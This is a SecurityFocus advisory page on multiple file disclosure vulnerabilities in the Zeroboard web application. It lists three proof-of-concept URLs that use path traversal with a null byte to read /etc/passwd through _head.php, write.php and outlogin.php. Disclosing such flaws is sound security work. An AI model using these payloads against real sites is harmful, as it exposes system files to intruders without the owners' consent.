Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Zeroboard Multiple File Disclosure Vulnerabilities

No exploit is required and the following proof of concepts are available:

http://www.example.com/_head.php?_zb_path=../../../../../etc/passwd%00
http://www.example.com/include/write.php?dir=../../../../../etc/passwd%00
http://www.example.com/outlogin.php?_zb_path=../../../../../etc/passwd%00







 

Privacy Statement
Copyright 2008, SecurityFocus